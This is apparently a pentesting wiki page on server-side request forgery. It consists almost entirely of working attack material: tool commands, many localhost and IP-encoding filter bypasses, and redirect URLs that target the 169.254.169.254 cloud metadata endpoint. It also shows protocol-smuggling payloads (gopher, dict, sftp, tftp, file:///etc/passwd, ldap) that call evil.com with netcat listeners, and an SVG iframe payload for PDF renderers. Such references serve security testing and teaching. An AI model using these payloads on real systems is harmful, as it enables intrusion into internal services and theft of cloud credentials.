Pentest Book
Search…
SSRF

Tools

1
# https://github.com/tarunkant/Gopherus
2
gopherus --exploit [PLATFORM]
3
# https://github.com/daeken/SSRFTest
4
# https://github.com/jmdx/TLS-poison/
5
# https://github.com/m4ll0k/Bug-Bounty-Toolz
6
# https://github.com/cujanovic/SSRF-Testing
7
# https://github.com/bcoles/ssrf_proxy
8
9
gau domain.com | python3 ssrf.py collab.listener.com
10
11
# https://github.com/micha3lb3n/SSRFire
12
./ssrfire.sh -d domain.com -s yourserver.com -f /path/to/copied_raw_urls.txt
13
14
# SSRF Redirect Payload generator
15
# https://tools.intigriti.io/redirector/
Copied!

Summary

Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker's choosing. In typical SSRF examples, the attacker might cause the server to make a connection back to itself, or to other web-based services within the organization's infrastructure, or to external third-party systems.
1
# Web requesting other ip or ports like 127.0.0.1:8080 or 192.168.0.1
2
chat:3000/ssrf?user=&comment=&link=http://127.0.0.1:3000
3
GET /ssrf?user=&comment=&link=http://127.0.0.1:3000 HTTP/1.1
Copied!

SSRF Attacks

1
# Check if you're able to enum IP or ports
2
127.0.0.1
3
127.0.1
4
127.1
5
127.000.000.001
6
2130706433
7
0x7F.0x00.0x00.0x01
8
0x7F.1
9
0x7F000001
10
11
# Quick URL based bypasses:
12
http://google.com:80+&@127.88.23.245:22/#[email protected]:80/
13
http://127.88.23.245:22/+&@google.com:80#[email protected]:80/
14
http://google.com:80+&@google.com:80#[email protected]:22/
15
http://127.88.23.245:22/[email protected]:80/
16
http://127.88.23.245:22/#@www.google.com:80/
17
18
# 301 responses:
19
https://ssrf.localdomain.pw/img-without-body/301-http-169.254.169.254:80-.i.jpg
20
https://ssrf.localdomain.pw/img-without-body-md/301-http-.i.jpg
21
https://ssrf.localdomain.pw/img-with-body/301-http-169.254.169.254:80-.i.jpg
22
https://ssrf.localdomain.pw/img-with-body-md/301-http-.i.jpg
23
24
# 301 json:
25
https://ssrf.localdomain.pw/json-without-body/301-http-169.254.169.254:80-.j.json
26
https://ssrf.localdomain.pw/json-without-body-md/301-http-.j.json
27
https://ssrf.localdomain.pw/json-with-body/301-http-169.254.169.254:80-.j.json
28
https://ssrf.localdomain.pw/json-with-body-md/301-http-.j.json
29
30
# 301 csv:
31
https://ssrf.localdomain.pw/csv-without-body/301-http-169.254.169.254:80-.c.csv
32
https://ssrf.localdomain.pw/csv-without-body-md/301-http-.c.csv
33
https://ssrf.localdomain.pw/csv-with-body/301-http-169.254.169.254:80-.c.csv
34
https://ssrf.localdomain.pw/csv-with-body-md/301-http-.c.csv
35
36
# 301 xml:
37
https://ssrf.localdomain.pw/xml-without-body/301-http-169.254.169.254:80-.x.xml
38
https://ssrf.localdomain.pw/xml-without-body-md/301-http-.x.xml
39
https://ssrf.localdomain.pw/xml-with-body/301-http-169.254.169.254:80-.x.xml
40
https://ssrf.localdomain.pw/xml-with-body-md/301-http-.x.xml
41
42
# 301 pdf:
43
https://ssrf.localdomain.pw/pdf-without-body/301-http-169.254.169.254:80-.p.pdf
44
https://ssrf.localdomain.pw/pdf-without-body-md/301-http-.p.pdf
45
https://ssrf.localdomain.pw/pdf-with-body/301-http-169.254.169.254:80-.p.pdf
46
https://ssrf.localdomain.pw/pdf-with-body-md/301-http-.p.pdf
47
48
# 30x custom:
49
https://ssrf.localdomain.pw/custom-30x/?code=332&url=http://169.254.169.254/&content-type=YXBwbGljYXRpb24vanNvbg==&body=eyJhIjpbeyJiIjoiMiIsImMiOiIzIn1dfQ==&fakext=/j.json
50
51
# 20x custom:
52
https://ssrf.localdomain.pw/custom-200/?url=http://169.254.169.254/&content-type=YXBwbGljYXRpb24vanNvbg==&body=eyJhIjpbeyJiIjoiMiIsImMiOiIzIn1dfQ==&fakext=/j.json
53
54
# 201 custom:
55
https://ssrf.localdomain.pw/custom-201/?url=http://169.254.169.254/&content-type=YXBwbGljYXRpb24vanNvbg==&body=eyJhIjpbeyJiIjoiMiIsImMiOiIzIn1dfQ==&fakext=/j.json
56
57
# HTML iframe + URL bypass
58
http://ssrf.localdomain.pw/iframe/?proto=http&ip=127.0.0.1&port=80&url=/
59
60
# SFTP
61
http://whatever.com/ssrf.php?url=sftp://evil.com:11111/
62
63
evil.com:$ nc -v -l 11111
64
Connection from [192.168.0.10] port 11111 [tcp/*] accepted (family 2, sport 36136)
65
SSH-2.0-libssh2_1.4.2
66
67
# Dict
68
http://safebuff.com/ssrf.php?dict://attacker:11111/
69
70
evil.com:$ nc -v -l 11111
71
Connection from [192.168.0.10] port 11111 [tcp/*] accepted (family 2, sport 36136)
72
CLIENT libcurl 7.40.0
73
74
# gopher
75
# http://safebuff.com/ssrf.php?url=http://evil.com/gopher.php
76
<?php
77
header('Location: gopher://evil.com:12346/_HI%0AMultiline%0Atest');
78
?>
79
80
evil.com:# nc -v -l 12346
81
Listening on [0.0.0.0] (family 0, port 12346)
82
Connection from [192.168.0.10] port 12346 [tcp/*] accepted (family 2, sport 49398)
83
HI
84
Multiline
85
test
86
87
# TFTP
88
# http://safebuff.com/ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET
89
90
evil.com:# nc -v -u -l 12346
91
Listening on [0.0.0.0] (family 0, port 12346)
92
TESTUDPPACKEToctettsize0blksize512timeout6
93
94
# file
95
http://safebuff.com/redirect.php?url=file:///etc/passwd
96
97
# ldap
98
http://safebuff.com/redirect.php?url=ldap://localhost:11211/%0astats%0aquit
99
100
# SSRF Bypasses
101
?url=http://safesite.com&site.com
102
?url=http://////////////site.com/
103
?url=http://[email protected]/account/edit.aspx
104
?url=http://site.com/account/edit.aspx
105
?url=http://safesite.com?.site.com
106
?url=http://safesite.com#.site.com
107
?url=http://safesite.com\.site.com/domain
108
?url=https://ⓈⒾⓉⒺ.ⓒⓞⓜ = site.com
109
?url=https://192.10.10.3/
110
?url=https://192.10.10.2?.192.10.10.3/
111
?url=https://192.10.10.2#.192.10.10.3/
112
?url=https://192.10.10.2\.192.10.10.3/
113
?url=http://127.0.0.1/status/
114
?url=http://localhost:8000/status/
115
?url=http://site.com/domain.php
116
<?php
117
header(‘Location: http://127.0.0.1:8080/status');
118
?>
119
120
# Localhost bypasses
121
0
122
127.00.1
123
127.0.01
124
0.00.0
125
0.0.00
126
127.1.0.1
127
127.10.1
128
127.1.01
129
0177.1
130
0177.0001.0001
131
0x0.0x0.0x0.0x0
132
0000.0000.0000.0000
133
0x7f.0x0.0x0.0x1
134
0177.0000.0000.0001
135
0177.0001.0000..0001
136
0x7f.0x1.0x0.0x1
137
0x7f.0x1.0x1
138
139
# Blind SSRF
140
- Review Forms
141
- Contact Us
142
- Password fields
143
- Contact or profile info (Names, Addresses)
144
- User Agent
145
146
# SSRF through video upload
147
# https://hackerone.com/reports/1062888
148
# https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/CVE%20Ffmpeg%20HLS
149
150
# SSRF in pdf rendering
151
<svg xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" class="highcharts-root" width="800" height="500">
152
<g>
153
<foreignObject width="800" height="500">
154
<body xmlns="http://www.w3.org/1999/xhtml">
155
<iframe src="http://169.254.169.254/latest/meta-data/" width="800" height="500"></iframe>
156
</body>
157
</foreignObject>
158
</g>
159
</svg>
Copied!
SSRF Bypasses
1
http://%32%31%36%2e%35%38%2e%32%31%34%2e%32%32%37
2
http://%73%68%6d%69%6c%6f%6e%2e%63%6f%6d
3
http://////////////site.com/
4
http://0000::1:80/
5
http://000330.0000072.0000326.00000343
6
http://000NaN.000NaN
7
http://0177.00.00.01
8
http://017700000001
9
http://0330.072.0326.0343
10
http://033016553343
11
http://0NaN
12
http://0NaN.0NaN
13
http://0x0NaN0NaN
14
http://0x7f000001/
15
http://0xd8.0x3a.0xd6.0xe3
16
http://0xd8.0x3a.0xd6e3
17
http://0xd8.0x3ad6e3
18
http://0xd83ad6e3
19
http://0xNaN.0xaN0NaN
20
http://0xNaN.0xNa0x0NaN
21
http://0xNaN.0xNaN
22
http://127.0.0.1/status/
23
http://127.1/
24
http://2130706433/
25
http://216.0x3a.00000000326.0xe3
26
http://3627734755
27
http://[::]:80/
28
http://localhost:8000/status/
29
http://NaN
30
http://safesite.com#.site.com
31
http://safesite.com&site.com
32
http://safesite.com?.site.com
33
http://safesite.com\.site.com/domain
34
http://shmilon.0xNaN.undefined.undefined
35
http://site.com/account/edit.aspx
36
http://site.com/domain.php
37
http://[email protected]/account/edit.aspx
39
https://192.10.10.2#.192.10.10.3/
40
https://192.10.10.2?.192.10.10.3/
41
https://192.10.10.2\.192.10.10.3/
42
https://192.10.10.3/
43
https://ⓈⒾⓉⒺ.ⓒⓞⓜ = site.com
44
<?php
45
header('Location: http://127.0.0.1:8080/status');
46
?>
47
48
# Tool
49
# https://h.43z.one/ipconverter/
Copied!

Mindmap

Last modified 4mo ago
Export as PDF
Copy link